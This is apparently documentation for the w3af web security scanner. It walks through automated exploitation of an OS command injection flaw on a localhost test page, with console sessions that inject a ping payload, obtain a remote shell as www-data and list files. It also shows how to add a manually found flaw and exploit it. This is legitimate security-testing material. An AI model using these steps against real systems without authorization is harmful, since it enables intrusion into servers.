Permalink
Fetching contributors…
Cannot retrieve contributors at this time
80 lines (69 sloc) 3.43 KB

Exploiting Web application vulnerabilities

w3af allows users to exploit Web application vulnerabilities in an automated manner. The vulnerabilities to be exploited can be identified using audit plugins or manually by the user (and then the vulnerability details are provided to w3af).

During the scan vulnerabilities are found and stored in specific locations of the knowledge base, from where exploit plugins can read and use the stored information to exploit the vulnerability. Exploiting a vulnerability identified by an audit plugin is easy:

w3af>>> plugins
w3af/plugins>>> audit os_commanding
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://localhost/w3af/os_commanding/v.php?command=f0as9
w3af/config:target>>> back
w3af>>> start
Found 1 URLs and 1 different points of injection.
The list of URLs is:
- http://localhost/w3af/os_commanding/v.php
The list of fuzzable requests is:
- http://localhost/w3af/os_commanding/v.php | Method: GET | Parameters: (command)
Starting os_commanding plugin execution.
OS Commanding was found at: "http://localhost/w3af/os_commanding/v.php", using HTTP method GET.
The sent data was: "command=+ping+-c+9+localhost". The vulnerability was found in the request with id 5.
Finished scanning process.
w3af>>> exploit
w3af/exploit>>> exploit os_commanding
os_commanding exploit plugin is starting.
Vulnerability successfully exploited. This is a list of available shells:
- [0] <os_commanding_shell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "end_interaction" to get out of the remote shell.
Commands typed in this menu will run on the remote web server.
w3af/exploit/os_commanding-0>>> ls
v.php
v2.php
v3.php
w3af/exploit/os_commanding-0>>> end_interaction
w3af/exploit>>> back
w3af>>>

Exploiting one you've found manually, requires you to provide some input:

w3af>>> kb
w3af/kb>>> help
| list            | List the items in the knowledge base.
| add             | Add a vulnerability to the KB
w3af/kb>>> add os_commanding
w3af/kb/config:os_commanding>>> view
| operating_system         | Remote operating system (linux or windows).
| name                     | Vulnerability name (eg. SQL Injection)
| url                      | URL (without query string parameters)
| vulnerable_parameter     | Vulnerable parameter
| separator                | Command separator used for injecting commands.
| data                     | Query string or postdata parameters in url-encoded form
| method                   | HTTP method
w3af/kb/config:os_commanding>>>

You simply set all the configuration settings and then execute save and back to store your vulnerability in the knowledge base. Once the information is there you'll be able to follow the same steps:

w3af>>> exploit
w3af/exploit>>> exploit os_commanding
os_commanding exploit plugin is starting.
Vulnerability successfully exploited. This is a list of available shells:
- [0] <os_commanding_shell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19")>
Please use the interact command to interact with the shell objects.